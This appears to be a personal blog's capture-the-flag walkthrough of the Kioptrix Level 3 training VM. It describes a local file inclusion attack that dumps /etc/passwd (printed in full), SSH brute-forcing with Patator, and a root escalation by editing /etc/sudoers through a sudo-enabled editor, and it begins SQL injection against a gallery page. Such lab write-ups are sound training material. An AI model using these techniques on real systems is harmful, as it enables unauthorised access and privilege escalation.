Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-71008267488416564532017-02-15T14:38:00.000+00:002017-02-15T14:40:41.167+00:00Kioptrix Level 3 (Don't forget the low hanging fruit)<div dir="ltr" style="text-align: left;" trbidi="on">
Back again!!<br />
<br />
I'm continuing with the Kioptrix series as I am really enjoying it. The trouble is......... I seem to be over thinking stuff and forgetting this isn't meant to be "difficult". Anyway enough pre-amble and more how to!!!<br />
<br />
<b><u>Scanning</u></b><br />
<b><u><br /></u></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTmPuSIfbU4bo1jFZDsEDojl4aEaeSjy9vpxEURbE8KTRZ0hv4rbYhMHMOsubcdj5G_yjxAxtFgbXG0PpuZjAFtM8kjeoJpJHASOvN3FSHNdsouu6eoYC_PK8PT8vMyLdzpALY4XTfS2w/s1600/Screenshot+from+2017-02-13+11-39-11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTmPuSIfbU4bo1jFZDsEDojl4aEaeSjy9vpxEURbE8KTRZ0hv4rbYhMHMOsubcdj5G_yjxAxtFgbXG0PpuZjAFtM8kjeoJpJHASOvN3FSHNdsouu6eoYC_PK8PT8vMyLdzpALY4XTfS2w/s320/Screenshot+from+2017-02-13+11-39-11.png" width="320" /></a></div>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b><br />
<br />
<br />
<br />
Only ssh and web are open here.<br />
<br />
<b><u>Web Checks</u></b><br />
<b><u><br /></u></b>
Browsing to the IP gave me the website below:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxG2xozWdFdn9Y0CHJ3fn0aY1IZu-VgVBetsjFEvZYxwgpkCN7OTiGRKQtBfhR3yMSIbNpQ5TPNE85if9DE40EkoK6URgXkoI3JCSz_4Ax9HY_Xzo7LITIf3-uji8eZt-hYoLR5vR2vpU/s1600/web1.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxG2xozWdFdn9Y0CHJ3fn0aY1IZu-VgVBetsjFEvZYxwgpkCN7OTiGRKQtBfhR3yMSIbNpQ5TPNE85if9DE40EkoK6URgXkoI3JCSz_4Ax9HY_Xzo7LITIf3-uji8eZt-hYoLR5vR2vpU/s400/web1.png" width="400" /></a><br />
<br />
There wasn't a robots.txt file giving any hidden directories away, so I carried on perusing the content to see if there was anymore info:<br />
<br />
I noticed the URL for the blog was interesting:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFbtaHbT6Fx5PN5DLu1Qp7uAS_CrpXgAnOgKE4KTS3mLLO6wFt9g8zZBxLxjQHQLDpSveiFOiDjSwH0frs0PFWjUat6L7SI2gnDFl5tF1422Xw7x7jsOmszauc2NdX8SN31nfuIiR2H8/s1600/Screenshot+from+2017-02-13+12-07-09.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFbtaHbT6Fx5PN5DLu1Qp7uAS_CrpXgAnOgKE4KTS3mLLO6wFt9g8zZBxLxjQHQLDpSveiFOiDjSwH0frs0PFWjUat6L7SI2gnDFl5tF1422Xw7x7jsOmszauc2NdX8SN31nfuIiR2H8/s400/Screenshot+from+2017-02-13+12-07-09.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
I wondered if I could manipulate it to give me information. First of all I tried some local file inclusion LFI:<br />
<br />
This took some tinkering as just adding a null byte () didn't work. I had to insert a character after the null byte in order for it to yield a result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWzztIOdZt1mXzHgzR2Xdtw-W5FVZjBU0BDwyF76KxU20yBfbiLfU3Mzbr_DZQgMAK7JCcl43Bveif3T9-iGf_ZwFDXQz2mSBj1ydnc9wpWtql1mwLuDqmQ2rYxHvIeCJw1lby9PHgXWE/s1600/Screenshot+from+2017-02-14+11-23-39.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWzztIOdZt1mXzHgzR2Xdtw-W5FVZjBU0BDwyF76KxU20yBfbiLfU3Mzbr_DZQgMAK7JCcl43Bveif3T9-iGf_ZwFDXQz2mSBj1ydnc9wpWtql1mwLuDqmQ2rYxHvIeCJw1lby9PHgXWE/s400/Screenshot+from+2017-02-14+11-23-39.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This made me think of a way to automate this task. After looking around on the web I found this code from a <a href="https://www.homelab.it/index.php/2014/08/26/alfi-scanner-an0th3r-lfi-sc4nn3r-v1-0/">BLOG</a>. I noticed it only scanned for conventional LFI so I amended it to my needs. The code can be found <a href="https://github.com/monkeysm8/CTF-Stuff/blob/master/LFI_Scanner.py">HERE</a>. When I ran the code it gave me the results quickly:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V0KrtLyydwPFRbOM-utA-F3c0dJ6nAWlHtpyvwD5TmYK0lZgto72r7Ffbjin5Q-vsrzKCP87Yp2ZHlzda39kgBpHJ5dwm-qmKZLK77XAdKXN9Y8Oltl2yh91RyqBsjUcroOzEjrm09Q/s1600/Screenshot+from+2017-02-14+11-28-20.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5V0KrtLyydwPFRbOM-utA-F3c0dJ6nAWlHtpyvwD5TmYK0lZgto72r7Ffbjin5Q-vsrzKCP87Yp2ZHlzda39kgBpHJ5dwm-qmKZLK77XAdKXN9Y8Oltl2yh91RyqBsjUcroOzEjrm09Q/s400/Screenshot+from+2017-02-14+11-28-20.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
That was a useful learning point for me, as my coding isn't the greatest. So what did the LFI give me?<br />
<br />
2 users that are of interest:<br />
<br />
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">root:x:0:0:root:/root:/bin/bash</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">daemon:x:1:1:daemon:/usr/sbin:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">bin:x:2:2:bin:/bin:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sys:x:3:3:sys:/dev:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sync:x:4:65534:sync:/bin:/bin/sync</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">games:x:5:60:games:/usr/games:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">man:x:6:12:man:/var/cache/man:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lp:x:7:7:lp:/var/spool/lpd:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">mail:x:8:8:mail:/var/mail:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">news:x:9:9:news:/var/spool/news:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">proxy:x:13:13:proxy:/bin:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">www-data:x:33:33:www-data:/var/www:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">backup:x:34:34:backup:/var/backups:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">list:x:38:38:Mailing List Manager:/var/list:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">irc:x:39:39:ircd:/var/run/ircd:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">nobody:x:65534:65534:nobody:/nonexistent:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">libuuid:x:100:101::/var/lib/libuuid:/bin/sh</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dhcp:x:101:102::/nonexistent:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">syslog:x:102:103::/home/syslog:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">klog:x:103:104::/home/klog:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false</span></div>
<div style="text-align: justify;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin</span></div>
<div style="text-align: justify;">
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash</b></span></div>
<div style="text-align: justify;">
<span style="color: red; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash</b></span></div>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">I couldn't pull the shadow file to grab their login creds, but I could have a go at brute forcing my way in via ssh.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Unfortunately Hydra was playing up and kept giving me errors but it wasn't an issue as I could use <a href="http://tools.kali.org/password-attacks/patator">Patator</a>.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwAIIhX14qF_bHoA6MrPh5r8yqysXPfdN2-rP3HwPPjNuuIj52_GC9OxnM0y99IXxFBBIx7a6c3OBaQrvDhr4ub3KXL-u9BdImWO_hW42A6fTBtJ5LHLSCw0zMt7meDRxXq3KFroNwSc/s1600/Screenshot+from+2017-02-14+17-01-58.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUwAIIhX14qF_bHoA6MrPh5r8yqysXPfdN2-rP3HwPPjNuuIj52_GC9OxnM0y99IXxFBBIx7a6c3OBaQrvDhr4ub3KXL-u9BdImWO_hW42A6fTBtJ5LHLSCw0zMt7meDRxXq3KFroNwSc/s640/Screenshot+from+2017-02-14+17-01-58.png" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">I now had some creds I could use to SSH across.</span><br />
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">I use loneferret's account first (it was first in the list)</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6gg92pzgFiSctthVYT584fGoc6LyTghJvAbWSW1_ORopYBzHvUlfhEsKC4vSwWLlNLHtXJcbbxNoyfa-gokl0XlTpe109JOK1sbw-DPTG9995E6k8FMcmYshekcjlCdkR6u8hJtkc_sw/s1600/Screenshot+from+2017-02-15+11-03-32.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6gg92pzgFiSctthVYT584fGoc6LyTghJvAbWSW1_ORopYBzHvUlfhEsKC4vSwWLlNLHtXJcbbxNoyfa-gokl0XlTpe109JOK1sbw-DPTG9995E6k8FMcmYshekcjlCdkR6u8hJtkc_sw/s400/Screenshot+from+2017-02-15+11-03-32.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Let's have a look at what's inside the folder I am in<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQbN7ZaZ2XUJhATy7qu9z_aHsHCnY0A0MNn4YDxMqjQaxtaUMFbUYpY1UQY3CVQ2EBMuM1jwRqCuAEhmgmAE5hWPkH8tEbmCEMETU-uxgW0QTx94v_SAHJ_mUxy25dbJjayyB9rs_E57o/s1600/Screenshot+from+2017-02-15+11-05-57.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQbN7ZaZ2XUJhATy7qu9z_aHsHCnY0A0MNn4YDxMqjQaxtaUMFbUYpY1UQY3CVQ2EBMuM1jwRqCuAEhmgmAE5hWPkH8tEbmCEMETU-uxgW0QTx94v_SAHJ_mUxy25dbJjayyB9rs_E57o/s400/Screenshot+from+2017-02-15+11-05-57.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span><br />
<span style="font-family: inherit;">Looks like the home directory to me!</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Reading the CompanyPolicy.README showed the "sudo ht" command. I ran it to see what this was, unfortunately I had an issue with my terminal type so I amended it:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioRYL8Bm7Ymz2-sFlUQGR_fbA31OuDTZXjEV3D9mTMRSCMncHawClEpXFohlJEEfinfn1E3AAqdYlwOstAh3jW2m6yVTcMDgh52aHLd2jMYPqUN9XHt1GfpvqxMp6rdHagRURv3viG6kw/s1600/Screenshot+from+2017-02-15+11-16-50.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioRYL8Bm7Ymz2-sFlUQGR_fbA31OuDTZXjEV3D9mTMRSCMncHawClEpXFohlJEEfinfn1E3AAqdYlwOstAh3jW2m6yVTcMDgh52aHLd2jMYPqUN9XHt1GfpvqxMp6rdHagRURv3viG6kw/s400/Screenshot+from+2017-02-15+11-16-50.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I have an editor with root privs COOL!!! I wonder if I can edit the /etc/sudoers file<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFO19aJ7ur-n82EFVsXw9mdSBbnogld0CHBVLpm7ZD3MP1HLNvwGUugyEdNC4wPZpkUXsAwQ2XKiqxySd2yVCpSurDHIjGsWJ4X-bPpvLYo8Kh1uRbgkWXhiVbK-uzAWjGbM0GDvzGo8/s1600/Screenshot+from+2017-02-15+11-18-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFO19aJ7ur-n82EFVsXw9mdSBbnogld0CHBVLpm7ZD3MP1HLNvwGUugyEdNC4wPZpkUXsAwQ2XKiqxySd2yVCpSurDHIjGsWJ4X-bPpvLYo8Kh1uRbgkWXhiVbK-uzAWjGbM0GDvzGo8/s400/Screenshot+from+2017-02-15+11-18-07.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
That a big yes!!<br />
<br />
So, save and exit:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSP_VPrbk_y-L5JItbGlzfYftDZhSiZxO8PeGNGU41gUEjwuAAIiJcXntT1Cark_YgnWFmqYbHMk0ki_G-F7H_hDHzDvCTrMc_JDZXkFvXtJaP7ZuxODkQGaoURROUxiqAZ6ve04joc8/s1600/Screenshot+from+2017-02-15+11-39-00.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSP_VPrbk_y-L5JItbGlzfYftDZhSiZxO8PeGNGU41gUEjwuAAIiJcXntT1Cark_YgnWFmqYbHMk0ki_G-F7H_hDHzDvCTrMc_JDZXkFvXtJaP7ZuxODkQGaoURROUxiqAZ6ve04joc8/s400/Screenshot+from+2017-02-15+11-39-00.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I am root!! It looks like the HT editor is susceptible to <a href="https://www.exploit-db.com/exploits/22683/">Buffer Overflow</a><br />
<br />
However when I tried to run the exploit on the server I got an error with the Perl version. I will revisit this again. Now onto the other methods of rooting this box?<br />
<br />
<b><u>SQLi</u></b><br />
<br />
The blog indicates there is a gallery:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9b9GsH65_Dyn-50Xxppu2UDy-2L5zscEQgt3sVRO7N4dMpyBdNAlQaEwbPMqEwdDs4okgImL_SGgrjc94wpB-yEorRb52BeGjF1G7VvGalNVsdC7AbhL0UL3thyphenhyphenGjxC9-j2ZKsid94Ik/s1600/web2.png" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9b9GsH65_Dyn-50Xxppu2UDy-2L5zscEQgt3sVRO7N4dMpyBdNAlQaEwbPMqEwdDs4okgImL_SGgrjc94wpB-yEorRb52BeGjF1G7VvGalNVsdC7AbhL0UL3thyphenhyphenGjxC9-j2ZKsid94Ik/s400/web2.png" width="400" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEtleAOp9ZcBQ-44ADGPUPl8gwzWRvyOmNQmd_JCR9N2lGiyCXTFZSPm-UDJuGkNxdv8yLQOlbm8UeGQzRxKHTyGIMK8qF4ZDibfRqJSXh0z812OVzCrx9SWvyoXUJgLYwSP1-HcBImSo/s1600/Screenshot+from+2017-02-13+11-59-42.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEtleAOp9ZcBQ-44ADGPUPl8gwzWRvyOmNQmd_JCR9N2lGiyCXTFZSPm-UDJuGkNxdv8yLQOlbm8UeGQzRxKHTyGIMK8qF4ZDibfRqJSXh0z812OVzCrx9SWvyoXUJgLYwSP1-HcBImSo/s400/Screenshot+from+2017-02-13+11-59-42.png" width="400" /></a></div>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
<b><u><br /></u></b>
Now I wonder what awaits me here?<br />
<br />
After looking around I came to this page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWQFGspcD6ktl5uqh-x99NzTwZBhLCt6ORw5RBGFRCaqfdGuPfbv-yDgOH3lEl2EAGKWPxki_cQQgmqZnhr2_t4w-lIIOeZHJyrSD6hXumxJcrjijtfdWaR67xPtvaUTWkadLzDSExu8c/s1600/Screenshot+from+2017-02-13+12-04-30.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWQFGspcD6ktl5uqh-x99NzTwZBhLCt6ORw5RBGFRCaqfdGuPfbv-yDgOH3lEl2EAGKWPxki_cQQgmqZnhr2_t4w-lIIOeZHJyrSD6hXumxJcrjijtfdWaR67xPtvaUTWkadLzDSExu8c/s400/Screenshot+from+2017-02-13+12-04-30.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The URL here looks interesting:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg20xOERgUOxN_p8JTfAOfox_hNx_JgwuDOD971TkCDDXBoEXuws6q71ftdV1nz2btpoOZKy2AFTOXUvBGAYlbARS9NvxzzI0QCst9665EX57ycXxJsYNf9q5vRispbLdrpZtAPtcjKlKU/s1600/Screenshot+from+2017-02-13+12-05-58.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg20xOERgUOxN_p8JTfAOfox_hNx_JgwuDOD971TkCDDXBoEXuws6q71ftdV1nz2btpoOZKy2AFTOXUvBGAYlbARS9NvxzzI0QCst9665EX57ycXxJsYNf9q5vRispbLdrpZtAPtcjKlKU/s400/Screenshot+from+2017-02-13+12-05-58.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
I wonder if I can inject?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQCTuNmQv4SCMltvZg5Hhqmq9t8QxZFrAuhutNF2Rh9vgmFfqItb_5LuVI0ir_iS7ruAYDOb_bFHdC5JCwwkypJ8Iaczi8j1p-SuNfq-wTO5fbl1o1VyfheikuLgkggfBtULLNHt4DvlU/s1600/Screenshot+from+2017-02-15+11-59-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQCTuNmQv4SCMltvZg5Hhqmq9t8QxZFrAuhutNF2Rh9vgmFfqItb_5LuVI0ir_iS7ruAYDOb_bFHdC5JCwwkypJ8Iaczi8j1p-SuNfq-wTO5fbl1o1VyfheikuLgkggfBtULLNHt4DvlU/s400/Screenshot+from+2017-02-15+11-59-41.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Yup!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-9BoHEKfPic6F_Pf7ypgymlAz9brVKHsUjlaurqP0XsmLmLU8d5SWnE9di9uWs-kr2je71TTrYCAykvDdJAtewsir59HblUIckOfe3-e103W7IkqzbQMNuMcJUQ9dPcplWHGbI54fWhE/s1600/Screenshot+from+2017-02-15+12-01-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-9BoHEKfPic6F_Pf7ypgymlAz9brVKHsUjlaurqP0XsmLmLU8d5SWnE9di9uWs-kr2je71TTrYCAykvDdJAtewsir59HblUIckOfe3-e103W7IkqzbQMNuMcJUQ9dPcplWHGbI54fWhE/s400/Screenshot+from+2017-02-15+12-01-41.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like there are 6 columns to peruse:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPm0nltAiuUcLY_-jvi2v5m1e4OOw73DjO2fx_pRRTW6J8UK2OrwwqZj9qJBO1_IR9bkqR9fwzdmziV_pNRHx7ktIKgtgcbGJdADSnHlIhyphenhyphenWr_YtuG1Ptr7KUbYtxyjBoLsYN__o97U50/s1600/Screenshot+from+2017-02-15+12-02-52.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPm0nltAiuUcLY_-jvi2v5m1e4OOw73DjO2fx_pRRTW6J8UK2OrwwqZj9qJBO1_IR9bkqR9fwzdmziV_pNRHx7ktIKgtgcbGJdADSnHlIhyphenhyphenWr_YtuG1Ptr7KUbYtxyjBoLsYN__o97U50/s400/Screenshot+from+2017-02-15+12-02-52.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
And column 2 is vulnerable to injection!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwNape0sxUNhcmARdY9txpjiAm2Qnn5EizRDjekYmabYb_MRERJme3mWBsl39eUcppM0w-uNBGX6FdZmYNKTWfRtEJJyCT46ZnQTl6QVSDjdSEndNy2Pz7ZL3Hbb0-eEo3KnH_GiwO598/s1600/Screenshot+from+2017-02-15+12-03-14.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwNape0sxUNhcmARdY9txpjiAm2Qnn5EizRDjekYmabYb_MRERJme3mWBsl39eUcppM0w-uNBGX6FdZmYNKTWfRtEJJyCT46ZnQTl6QVSDjdSEndNy2Pz7ZL3Hbb0-eEo3KnH_GiwO598/s400/Screenshot+from+2017-02-15+12-03-14.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Looks like I have a MYSQL DB running on a Ubuntu server.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHBOWQvMQJ9GH1hN172E1U9-XI3BITKO98W_h_RiAenzgqzz6zwkiV6Yct7rSscafV6MApUFU8AllPbWFrGeTiWBRmfI4gtvKOqT2xNcz_rl2-LY6zi9xL2obeFNOjMvvF4a07oVPt7GM/s1600/Screenshot+from+2017-02-15+12-03-41.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHBOWQvMQJ9GH1hN172E1U9-XI3BITKO98W_h_RiAenzgqzz6zwkiV6Yct7rSscafV6MApUFU8AllPbWFrGeTiWBRmfI4gtvKOqT2xNcz_rl2-LY6zi9xL2obeFNOjMvvF4a07oVPt7GM/s400/Screenshot+from+2017-02-15+12-03-41.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The current DB in use here is gallery.<br />
<br />
